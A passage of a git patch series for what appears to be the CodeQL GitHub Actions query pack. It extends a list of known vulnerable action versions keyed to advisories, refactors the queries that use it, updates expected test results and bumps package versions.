["rlespinasse/github-slug-action", "1.0.1", "e46186066296e23235242d0877e2b4fe54003d54", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.0.0", "9671420482a6e4c59c06f2d2d9e0605e941b1287", "4.4.1"] + + # Azure/setup-kubectl + # https://github.com/advisories/GHSA-p756-rfxh-x63h + # CVE-2023-23939 + - ["Azure/setup-kubectl", "v2.1", "6025c840858f1afa584a5190a4426c338f59e503", "3"] + - ["Azure/setup-kubectl", "v2.0", "7ad2aa66bb42774adf65a0c580fbc96b2dadd747", "3"] + - ["Azure/setup-kubectl", "v1", "a625ca209b0faaa8871dac8fb5f50ee4b4d22622", "3"] + + # gajira-create + # https://github.com/advisories/GHSA-4xqx-pqpj-9fqw + # CVE-2020-14188 + - ["atlassian/gajira-create", "v2.0.0", "77d13eab156b8ad1c08c0655011b8a442c502998", "2.0.1"] + - ["atlassian/gajira-create", "v1.0.3", "14c3d657c383981ee595d9750f68d7e4e77d64d0", "2.0.1"] + - ["atlassian/gajira-create", "v1.0.1", "2cd32e0738e2b31717e7119717fed83e482d2a36", "2.0.1"] + - ["atlassian/gajira-create", "v1.0.0", "f11e88bf4a1358e741ac282bc198a4f21cb719a1", "2.0.1"] + + # hashicorp/vault-action + # https://github.com/advisories/GHSA-4mgv-m5cm-f9h7 + # CVE-2021-32074 + - ["hashicorp/vault-action", "v2.1.2", "5e5c06a3c8e96b7c4757fe7a10e03469cdbd07bb", "2.2.0"] + - ["hashicorp/vault-action", "v2.1.1", "2fb78ab91e55be5479aacf74f7b451eab79773a4", "2.2.0"] + - ["hashicorp/vault-action", "v2.1.0", "2ca76a4465bca4f71fc88320e67551a287f7eaec", "2.2.0"] + - ["hashicorp/vault-action", "v2.0.1", "952d5d48e4448ad364651cc473aeccc25bd169d9", "2.2.0"] + - ["hashicorp/vault-action", "v2.0.0", "e27b45646f82a319c8157e545e24b7588510a397", "2.2.0"] + - ["hashicorp/vault-action", "v1.0.1", "22e3f3e09e3baba4d6cc62823175d21fafe4e30a", "2.2.0"] + - ["hashicorp/vault-action", "v1.0.0", "727494f451d57cbfc932a1d8bce1b0a027d99a8b", "2.2.0"] + - ["hashicorp/vault-action", "v0.10.2", "9878eba70ad6c6e21a01bd1e2debd3f3b7cbc46e", "2.2.0"] + - ["hashicorp/vault-action", "v0.10.1", "567ec72c33597ee9feca8bed4611a8ace38330c2", "2.2.0"] + - ["hashicorp/vault-action", "v0.10.0", "5c464962be8937589f883cf209d21b3982c92360", "2.2.0"] + - ["hashicorp/vault-action", "v0.9.0", "50ece41861b565239528923369690fc43cc0050b", "2.2.0"] + - ["hashicorp/vault-action", "v0.8.0", "4ab6f6070f5be6702101c9736961beb8105e8708", "2.2.0"] + - ["hashicorp/vault-action", "v0.7.0", "4edbc9a77a84bd34b0da2e8b8d527871b6103aae", "2.2.0"] + - ["hashicorp/vault-action", "v0.6.2", "7d1d7d26adb265e6ebc6018ce2b92be7c5a7c63c", "2.2.0"] + - ["hashicorp/vault-action", "v0.6.1", "f9753d75ef0cdafe621cda2323b5dcc4d673d01a", "2.2.0"] + - ["hashicorp/vault-action", "v0.6.0", "0188d9d223dac8b24b94b04d3253bf0fe0365ca7", "2.2.0"] + - ["hashicorp/vault-action", "v0.5.0", "f229481670b4719a05f01e8fd8478c191a373c43", "2.2.0"] + - ["hashicorp/vault-action", "v0.4.0", "3b9239de79207bf3fba80a16916f257918ab1d15", "2.2.0"] + - ["hashicorp/vault-action", "v0.3.1", "ab4dc55b2ecc6eb5926c5caffa45eaf0c3ad735a", "2.2.0"] + - ["hashicorp/vault-action", "v0.3.0", "3747195c5f2848179bf615690b3e66e69a5e4dc7", "2.2.0"] + - ["hashicorp/vault-action", "v0.2.2", "da9a93f3f5bec24febf304139a6cbe61f0f8ad5e", "2.2.0"] + - ["hashicorp/vault-action", "v0.2.1", "6784ab38963b266384880094ff02eb13334802f4", "2.2.0"] + - ["hashicorp/vault-action", "v0.2.0", "6784ab38963b266384880094ff02eb13334802f4", "2.2.0"] + - ["hashicorp/vault-action", "v0.1.0", "19c0b21a1ddb75543178ac4a250b5b7cff7fd55a", "2.2.0"] + + # check-spelling/check-spelling + # https://github.com/advisories/GHSA-g86g-chm8-7r2p + # CVE-2021-32724 + - ["check-spelling/check-spelling", "v0.0.18", "08f08a6ff6b9ebae06cb8fe463374a8a5a37e03c", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.17-alpha", "ead83f4596b4aac06f698b501b5beb3218f6214d", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.16-alpha", "5f7f35b25e6bce7b1e5a8f226369a86ab19a623e", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.15-alpha", "d8f2d9ec30e38ffae03410088062714ac04c36cd", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.14-alpha", "67ea89eaff703694453dbfd346c4c31dfab646fc", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.13-alpha", "a9db57b850b66cb664373f19f6628c4ee39fbcb5", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.12-alpha", "22b3d11338aea9482eda87725ab15b8862de4061", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.11-alpha", "10d8401e72f7b4752a765b61ecbd1539394d6f4e", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.10-alpha", "c79ba85e2b8e45ef0a8da9eb0d16e7f2135ad2c6", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.9-alpha", "13d6bbcc0a082113d1c2d33ea41fcbe915e62de9", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.8-alpha", "6505ab5f1ebbe080fc072ea3cf68bac289f419ac", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.7-alpha", "a27e3104c5c8d69c2986d22c938e679ec0f1b2c7", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.6-alpha", "8a7dfc447cd58195531f7c313f6ff693f0e2eb89", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.5-alpha", "e584b835f290270af78538013634f348d6cc7398", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.4-alpha", "cb465b08587798aa788dfd9bc345c2c982ac9e29", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.3-alpha", "b8e280ae90b28f1aadc50f93073aa6450afe820d", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.2-alpha", "8e32de8a016bc4dce4170ec36881cbb315f94ff4", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.1-alpha", "d2d0ee06c72600982d2f80bca187ce90fee6ad94", "0.0.19"] diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 93f6688d2b4..856fbaebb19 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.27 +version: 0.1.28 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql index 16404edc500..c0a81b66a48 100644 --- a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql @@ -12,37 +12,8 @@ */ import actions +import codeql.actions.security.UseOfKnownVulnerableActionQuery -abstract class KnownVulnerableAction extends UsesStep { - abstract string getFixedVersion(); -} - -class ActionsDownloadArtifact extends KnownVulnerableAction { - ActionsDownloadArtifact() { - this.getCallee() = "actions/download-artifact" and - ( - this.getVersion() = - [ - "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", - "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", - "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", - ] - or - this.getVersion() - .matches([ - "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", - "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", - "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", - "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", - "18f0f591", "18f0f591", - ] + "%") - ) - } - - override string getFixedVersion() { result = "4.1.7" } -} - -// gh api /repos/actions/download-artifact/tags --jq 'map({name: .name, sha: .commit.sha})' --paginate from KnownVulnerableAction step select step, "The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@", step, diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql index bf7623ef260..a50c47a9793 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql @@ -14,28 +14,15 @@ import actions import codeql.actions.security.PoisonableSteps +import codeql.actions.security.UseOfKnownVulnerableActionQuery -from UsesStep download +from UsesStep download, KnownVulnerableAction vulnerable_action where - download.getCallee() = "actions/download-artifact" and + vulnerable_action.getVulnerableAction() = download.getCallee() and download.getCallee() = "actions/download-artifact" and ( - download.getVersion() = - [ - "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", - "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", - "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", - ] - or - download - .getVersion() - .matches([ - "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", - "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", - "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", - "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", - "18f0f591", "18f0f591", - ] + "%") + download.getVersion() = vulnerable_action.getVulnerableVersion() or + download.getVersion() = vulnerable_action.getVulnerableSha() ) and ( // exists a poisonable upload artifact in the same workflow diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6ceb57f0946..73dff5a1dc8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.27 +version: 0.1.28 groups: [actions, queries] suites: codeql-suites extractor: javascript diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected index 4749fc35817..a89ef0bfbe5 100644 --- a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected +++ b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected @@ -1,9 +1,9 @@ -| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:10:9:11:6 | Uses Step | v1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:11:9:12:6 | Uses Step | v1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:12:9:13:6 | Uses Step | v2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:13:9:14:6 | Uses Step | v2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:14:9:15:6 | Uses Step | v3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:15:9:16:6 | Uses Step | v3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:16:9:17:6 | Uses Step | v4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.7 | | .github/workflows/test1.yml:17:9:18:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 87c55149d96e628cc2ef7e6fc2aab372015aec85 | .github/workflows/test1.yml:17:9:18:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 4.1.7 | | .github/workflows/test1.yml:18:9:19:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 9bc31d5ccc31df68ecc42ccf4149144866c47d8a | .github/workflows/test1.yml:18:9:19:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 4.1.7 | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 70eb169860e..665e9626b24 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -1,20 +1,20 @@ -| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref '3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref '5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref '2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | -| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref '2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref '2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | -| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | -| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref '4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | -| .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref '1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | -| .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref '3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | -| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref '1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | +| .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | From c9b7340718863d318202253286f5c5bb71edb2ad Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 1 Aug 2024 11:38:46 +0200 Subject: [PATCH 0442/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 93f6688d2b4..856fbaebb19 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.27 +version: 0.1.28 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6ceb57f0946..73dff5a1dc8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.27 +version: 0.1.28 groups: [actions, queries] suites: codeql-suites extractor: javascript From def170425af2e3553523964640572a6f4a3e2083 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 1 Aug 2024 11:43:48 +0200 Subject: [PATCH 0443/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 856fbaebb19..dff01f80f2b 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 